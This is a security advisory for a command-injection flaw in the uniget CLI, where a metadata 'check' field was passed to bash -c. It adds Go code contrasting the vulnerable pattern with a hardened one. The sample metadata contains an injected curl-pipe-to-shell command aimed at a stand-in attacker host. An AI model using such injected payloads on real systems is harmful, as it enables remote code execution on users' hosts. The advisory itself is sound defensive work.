Impact
uniget is a universal tool installer that processes JSON metadata files. Prior to version 0.27.1, the tool command evaluates the metadata's "check" field by passing the raw string to /bin/bash -c. Because the value is taken directly from the metadata without any validation or sanitization, every shell metacharacter in it (for example ;, |, or $(...)) is interpreted, so an attacker who controls a metadata file can embed arbitrary shell commands. The injected code runs whenever a user invokes a uniget operation that evaluates the field, such as describe, install, update, or inspect, with the privileges of the user running uniget; when that user is root, this amounts to complete compromise of the host.
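To make the vulnerable pattern concrete, here is an added Go example (uniget itself is written in Go); it is illustration code, not code from the uniget project. It parses a constructed metadata file, shows the pre-0.27.1 shape in which the raw check string becomes the argument of bash -c, and contrasts it with one possible hardening that tokenizes the string, rejects shell metacharacters, pins argv[0] to the tool's own binary, and executes the result through exec.Command without a shell. The struct fields, the sample entries, and the hardening approach are assumptions chosen for this example; they are not uniget's real schema or its actual 0.27.1 fix.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"os/exec"
	"regexp"
	"strings"
)

// Tool mirrors the subset of a uniget-style metadata entry that matters here.
// Field names are assumptions for this example, not uniget's actual schema.
type Tool struct {
	Name   string `json:"name"`
	Binary string `json:"binary"`
	Check  string `json:"check"`
}

// Constructed metadata: one benign entry and one carrying an injected command.
const sampleMetadata = `[
  {"name": "kubectl", "binary": "kubectl", "check": "kubectl version --client"},
  {"name": "evil", "binary": "evil", "check": "evil --version; curl http://attacker.invalid/x | sh"}
]`

func parseMetadata(data []byte) ([]Tool, error) {
	var tools []Tool
	if err := json.Unmarshal(data, &tools); err != nil {
		return nil, err
	}
	return tools, nil
}

// vulnerableArgv reproduces the pre-0.27.1 pattern described in the advisory:
// the raw check string becomes the argument of `bash -c`, so every shell
// metacharacter in it is interpreted by bash.
func vulnerableArgv(t Tool) []string {
	return []string{"/bin/bash", "-c", t.Check}
}

// tokenPattern is the character set a single argv element may contain. It
// deliberately excludes ; & | $ ` < > ( ) quotes, glob characters, whitespace
// and newlines, so nothing the shell would treat specially gets through.
var tokenPattern = regexp.MustCompile(`^[A-Za-z0-9._/:=@,+-]+$`)

// hardenedArgv is one possible fix (an assumption, not necessarily uniget's
// actual 0.27.1 change): split the check string on whitespace, validate every
// token, require argv[0] to be the tool's own binary, and return an argv that
// is executed directly, never via a shell.
func hardenedArgv(t Tool) ([]string, error) {
	argv := strings.Fields(t.Check)
	if len(argv) == 0 {
		return nil, errors.New("empty check command")
	}
	if argv[0] != t.Binary {
		return nil, fmt.Errorf("check must invoke %q, got %q", t.Binary, argv[0])
	}
	for _, tok := range argv {
		if !tokenPattern.MatchString(tok) {
			return nil, fmt.Errorf("rejected token %q: contains shell metacharacters", tok)
		}
	}
	return argv, nil
}

// runCheck executes an argv with exec.Command, which hands the arguments to
// the new process unchanged; there is no shell to expand `;`, `|` or `$(...)`.
func runCheck(argv []string) (string, error) {
	out, err := exec.Command(argv[0], argv[1:]...).CombinedOutput()
	return string(out), err
}

func main() {
	tools, err := parseMetadata([]byte(sampleMetadata))
	if err != nil {
		panic(err)
	}
	for _, t := range tools {
		fmt.Printf("%-8s bash -c would see: %q\n", t.Name, vulnerableArgv(t)[2])
		if argv, err := hardenedArgv(t); err != nil {
			fmt.Printf("%-8s hardened: rejected (%v)\n", t.Name, err)
		} else {
			fmt.Printf("%-8s hardened: argv=%q\n", t.Name, argv)
		}
	}
	// Execute one hardened check for real, using a binary present on any Unix host.
	if argv, err := hardenedArgv(Tool{Name: "uname", Binary: "uname", Check: "uname -s"}); err == nil {
		out, err := runCheck(argv)
		fmt.Printf("%-8s ran directly: %q err=%v\n", "uname", strings.TrimSpace(out), err)
	}
}
```

Pinning argv[0] to the tool's binary does not by itself help when the attacker authors the whole entry, as the evil entry shows (its binary field matches); the per-token check is what stops the injection, and the durable remedy is to consume metadata only from a source you trust, whether signed, pinned, or vendored. `go run` the file to see both entries evaluated.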
Affected Systems
The vulnerability affects the uniget command‑line interface distributed by uniget‑org. All releases older than 0.27.1 are affected. The product is referred to as uniget CLI by the vendor.
Risk and Exploitability
The CVSS base score of 7.8 (High) expresses the severity of a successful exploit, not the probability that exploitation occurs. No EPSS score is available, so the exploitation probability cannot be quantified, and the flaw is not listed in the CISA KEV catalog. Exploitation requires attacker-controlled metadata to reach uniget: it may arrive remotely if uniget fetches metadata from an untrusted source, or locally if an attacker can place a crafted file where uniget reads it. The injected commands run only when a uniget command that evaluates the check field is executed, so the attacker depends on a user or automation (for example a provisioning script or CI job) running uniget against the crafted metadata. The risk is therefore high for systems that consume metadata from untrusted sources or run uniget, especially as root, without restricting its input.
OpenCVE Enrichment
Github GHSA